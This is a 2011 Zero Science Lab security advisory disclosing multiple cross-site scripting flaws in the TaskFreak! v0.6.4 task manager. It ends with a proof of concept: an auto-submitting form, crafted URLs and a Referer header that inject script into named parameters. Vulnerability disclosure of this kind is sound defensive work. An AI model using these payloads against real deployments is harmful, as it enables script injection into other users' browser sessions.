TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities

2011-02-11T00:00:00
ID ZSL-2011-4990
Type zeroscience
Reporter Gjoko Krstic
Modified 2011-02-11T00:00:00

Description

Title: TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities
Advisory ID: ZSL-2011-4990
Type: Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 11.02.2011

Summary

TaskFreak! Original is a simple but efficient web based task manager written in PHP.

Description

TaskFreak! suffers from multiple XSS vulnerabilities when parsing input to multiple parameters in different scripts. The vulnerable POST parameters are: 'sContext', 'sort', 'dir' and 'show' thru index.php. Also the GET parameters 'dir' and 'show' thru 'print_list.php' are vulnerable. Header variable 'referer' is vulnerable thru rss.php script. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session.

Vendor

Stan Ozier - <http://www.taskfreak.com>

Affected Version

0.6.4 (multi-user)

Tested On

MS Windows XP Pro SP3-EN, XAMPP (latest)

Vendor Status

[27.01.2011] Vulnerability discovered.
[31.01.2011] Tried contacting vendor thru their forums.
[01.02.2011] 3rd party offered to review vuln details and offered patching.
[10.02.2011] No response from vendor.
[11.02.2011] Public advisory released.

PoC

taskfreak_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
High five to Borg

References

[1] <git://borg.uu3.net/OEM/taskfreak.git>
[2] <http://packetstormsecurity.org/files/98426>
[3] <http://www.exploit-db.com/exploits/16158>
[4] <http://securityreason.com/wlb_show/WLB-2011020047>
[5] <http://www.securityfocus.com/bid/46350>
[6] <http://secunia.com/advisories/43318/>
[7] <http://www.securityhome.eu/exploits/exploit.php?eid=9581802394d561484427503.77666550>
[8] <http://xforce.iss.net/xforce/xfdb/65359>
[9] <http://osvdb.org/show/osvdb/70877>
[10] <http://osvdb.org/show/osvdb/70878>
[11] <http://osvdb.org/show/osvdb/70932>
[12] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-1062>

Changelog

[11.02.2011] - Initial release
[12.02.2011] - Added reference [2], [3] and [4]
[14.02.2011] - Added reference [5], [6] and [7]
[15.02.2011] - Added reference [8]
[17.02.2011] - Added reference [9] and [10]
[25.02.2011] - Added reference [11] and [12]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            ################################################################

TaskFreak! v0.6.4 Multiple Cross-Site Scripting Vulnerabilities


Vendor: Stan Ozier
Product web page: http://www.taskfreak.com
Affected version: 0.6.4 (multi-user)

Summary: TaskFreak! Original is a simple but efficient web based
task manager written in PHP.

Desc: TaskFreak! suffers from multiple XSS vulnerabilities when parsing
input to multiple parameters in different scripts. The vulnerable POST
parameters are: 'sContext', 'sort', 'dir' and 'show' thru index.php. Also
the GET parameters 'dir' and 'show' thru 'print_list.php' are vulnerable.
Header variable 'referer' is vulnerable thru rss.php script. Attackers
can exploit these weaknesses to execute arbitrary HTML and script code in
a user's browser session.

Tested on: MS Windows XP Pro SP3-EN, XAMPP (latest)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2011-4990
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990.php


27.01.2011

################################################################


&lt;script type="text/javascript"&gt;function xss(){document.forms["zappa"].submit();}&lt;/script&gt;
&lt;form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa"&gt;
	&lt;input type="hidden" name="sProject" value="0" /&gt;
        &lt;input type="hidden" name="id" value="" /&gt;
        &lt;input type="hidden" name="mode" value="save" /&gt;
	&lt;input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' /&gt;
        &lt;input type="hidden" name="sort" value='"&gt;&lt;script&gt;alert(1)&lt;/script&gt;' /&gt;
    	&lt;input type="hidden" name="dir" value='"&gt;&lt;script&gt;alert(2)&lt;/script&gt;' /&gt;
        &lt;input type="hidden" name="show" value='"&gt;&lt;script&gt;alert(3)&lt;/script&gt;' /&gt;
&lt;/form&gt;
&lt;a href="javascript: xss();" style="text-decoration:none"&gt;
&lt;b&gt;&lt;font color="red"&gt;&lt;center&gt;&lt;h3&gt;Exploit!&lt;h3&gt;&lt;/center&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;

---

http://taskfreak/print_list.php?dir=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://taskfreak/print_list.php?show=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

---

GET /taskfreak/rss.php HTTP/1.1
Referer: "&gt;Waddup!
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*